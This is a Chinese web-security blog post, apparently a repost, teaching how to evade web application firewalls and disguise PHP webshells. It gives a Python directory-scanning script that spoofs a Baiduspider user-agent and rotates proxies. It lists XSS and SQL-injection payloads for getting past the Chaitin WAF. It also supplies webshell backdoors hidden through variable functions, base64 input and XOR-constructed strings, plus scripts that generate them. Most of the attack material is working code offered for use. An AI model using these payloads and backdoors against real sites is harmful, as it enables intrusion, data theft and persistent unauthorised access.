web安全-waf+免杀-编程阁

识别是否有 WAF

利用工具：wafw00f 的安装及使用

成功之后多几个文件夹配置

百度的好像没有成功。。。。

数据包中的 X -Powered-By

waf 拦截各种情况(配合探针使用)

拦截 head 头的请求

此时扫描目录，发现全部都是 200 可访问状态

原因：很多扫描器为了追求较快的反应速度，都会使用 head 请求，从而被 waf 拦截

解决方法：7kbscan 扫描工具选择 get 请求或者 post 请求

拦截单个 IP 连续访问

解决方法：

开启延迟（推荐）

使用搜索引擎的 user-agent

如百度的

使用代码进行爬取

importrequestsimporttimeheaders={'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','Accept-Encoding':'gzip, deflate, br','Accept-Language':'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6','Cache-Control':'max-age=0','Connection':'keep-alive','Cookie':'PHPSESSID=4d6f9bc8de5e7456fd24d60d2dfd5e5a','sec-ch-ua':'"Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"','sec-ch-ua-mobile':'?0','Sec-Fetch-Dest':'document','Sec-Fetch-Mode':'navigate','Sec-Fetch-Site':'none','Sec-Fetch-User':'?1','Upgrade-Insecure-Requests':'1','User-Agent':'Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)'}forpathsinopen('php_b.txt',encoding='utf-8'): url="http://127.0.0.1/pikachu"paths=paths.replace('\n','')urls=url + paths proxy={'http':'127.0.0.1:7777'}try: code=requests.get(urls,headers=headers,proxies=proxy).status_code# time.sleep(3)print(urls +'|'+ str(code))except Exception as err: print('connect error')time.sleep(3)

使用代理池（推荐）

建议使用付费代理池，稳定，可以轻松解决含有 safedog，BT，阿里云等的探针。

免费代理池搭建：https://blog.csdn.net/weixin_48584917/article/details/121710521

使用：

进入 Redis-x64-3.0.504 文件夹，打开 cmd，输入命令：redis-server.exe redis.windows.conf，启动 Redis 服务。

再打开一个 cmd 窗口，输入：redis-server –service-install redis.windows.conf，安装 Redis 到 Window 服务。

关闭第一个 cmd 窗口，第二个中输入：redis-server –service-start，启动 Windows 服务中的 Redis 服务。

注：如果报错，先看看服务中是否已经打开，或者先卸载 Redis 服务：redis-server –service-uninstall

进入 proxy_pool-master 文件夹，打开 cmd，输入命令：python proxyPool.py schedule，启动调度程序。

再打开一个 cmd 命令窗口，输入命令：python proxyPool.py server，启动 webApi 服务。

到浏览器，输入：127.0.0.1:5010，可选择目录，如 127.0.0.1:5010/get

启动 web 服务后, 默认配置下会开启 http://127.0.0.1:5010 的 api 接口服务:

api	method	Description	params
/	GET	api 介绍	None
/get	GET	随机获取一个代理	可选参数:?type=https过滤支持 https 的代理
/pop	GET	获取并删除一个代理	可选参数:?type=https过滤支持 https 的代理
/all	GET	获取所有代理	可选参数:?type=https过滤支持 https 的代理
/count	GET	查看代理数量	None
/delete	GET	删除代理	?proxy=host:ip

绕过长亭 waf 的几个姿势

反射型 xss：

</script><video/onloadstart=0;[1].some(confirm)><source/>"><video/onloadstart=0;[1].some(confirm)><source/

sql 注入

原参数：参数 ='6'

为真：参数 ='6')+and+instr('1','1')+in+(1

为假：参数 ='6')+and+instr('2','1')+in+(1

爆出数据库用户名为 xxx：参数 ='6')+and+instr(user,'xxx')+in+(1

原参数：参数 =f%2C2

为真：参数 =f%2C2')+and+'1'+('1

为假：参数 =f%2C2')+and+'2'+('1

爆出数据库用户名为 xxx：参数 =f%2C2')+and+user+like+('xxx

原参数：参数 =yyy

为真：参数 =yyy'||1/1||'

为假：参数 =yyy'||1/0||'

爆出数据库用户名长度为 3：参数 =yyy'||1/(length(user)-3)||'

代码脚本后门免杀

php 传参绕过

原理：绕过正则表达式匹配关键函数代码

相当于把关键字的函数代码以参数值发送不在代码中体现

<?php$a=$_GET['a'];$aa=$a.'ert';$aa(base64_decode($_POST['X']));// 传入参数后相当于 assert(phpinfo());?>?a=assx=cGhwaW5mbygpOw==

php 变量覆盖

<?php$a='b';$b='assert';$$a(base64_decode($_POST['x']));?>

php 加密变异

http://www.phpjm.net
https://www.phpjms.com/
思路：将 webshell 加密，上传过程中则不会被检测出，然后传参时使用参数加密绕过参数检测

php 异或运算无字符 webshell

步骤1：修改代码中的正则表达式并运行，运行后生成一个 txt 文档，包含所有可见字符的异或构造结果。<?php /*author yu22x*/$myfile=fopen("xor_rce.txt","w");$contents="";for($i=0;$i<256;$i++){for($j=0;$j<256;$j++){if($i<16){$hex_i='0'.dechex($i);}else{$hex_i=dechex($i);}if($j<16){$hex_j='0'.dechex($j);}else{$hex_j=dechex($j);}$preg='/[a-z0-9]/i';// 根据题目给的正则表达式修改即可 if(preg_match($preg, hex2bin($hex_i))||preg_match($preg, hex2bin($hex_j))){echo"";}else{$a='%'.$hex_i;$b='%'.$hex_j;$c=(urldecode($a)^urldecode($b));if(ord($c)>=32&ord($c)<=126){$contents=$contents.$c." ".$a." ".$b."\n";}}}}fwrite($myfile,$contents);fclose($myfile);?>步骤2：运行 python 脚本即可# -*- coding: utf-8 -*-# author yu22ximportrequestsimporturllib from sysimport*importos def action(arg):s1=""s2=""foriinarg:f=open("xor_rce.txt","r")whileTrue:t=f.readline()ift=="":breakift[0]==i:#print(i)s1+=t[2:5]s2+=t[6:9]breakf.close()output="(\""+s1+"\"^\""+s2+"\")"return(output)whileTrue:param=action(input("\n[+] your function："))+action(input("[+] your command："))+";"print(param)如[+]your function：system[+]your command：ls("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%0c%13"|"%60%60");

好淘云 (haotaoyun.com) · 实时更新全网云服务器优惠 · 分享建站、运维及网络安全小技巧
点击查看全网最新服务器优惠活动：https://www.haotaoyun.com/new

web安全-waf+免杀

识别是否有 WAF

利用工具：wafw00f 的安装及使用

数据包中的 X -Powered-By

waf 拦截各种情况(配合探针使用)

拦截 head 头的请求

拦截单个 IP 连续访问

开启延迟（推荐）

使用搜索引擎的 user-agent

使用代码进行爬取

使用代理池（推荐）

绕过长亭 waf 的几个姿势

代码脚本后门免杀

php 传参绕过

php 变量覆盖

php 加密变异

php 异或运算无字符 webshell

语义变化检测论文阅读：BT-HRSCD

OpenClaw隐私保护机制：千问3.5-27B处理敏感数据的隔离方案

3分钟生成专业PPT：md2pptx零门槛Markdown转换神器

Dify在Windows上的部署

实时行情系统设计：从协议选择到高可用架构，再到数据源选型鸭

终极风扇控制指南：5步实现Windows系统散热与静音的完美平衡

识别是否有 WAF

利用工具：wafw00f 的安装及使用

数据包中的 X -Powered-By

waf 拦截各种情况(配合探针使用)

拦截 head 头的请求

拦截单个 IP 连续访问

开启延迟（推荐）

使用搜索引擎的 user-agent

使用代码进行爬取

使用代理池（推荐）

绕过长亭 waf 的几个姿势

代码脚本后门免杀

php 传参绕过

php 变量覆盖

php 加密变异

php 异或运算 无字符 webshell

语义变化检测论文阅读：BT-HRSCD

OpenClaw隐私保护机制：千问3.5-27B处理敏感数据的隔离方案

3分钟生成专业PPT：md2pptx零门槛Markdown转换神器

Dify在Windows上的部署

实时行情系统设计：从协议选择到高可用架构，再到数据源选型鸭

终极风扇控制指南：5步实现Windows系统散热与静音的完美平衡

php 异或运算无字符 webshell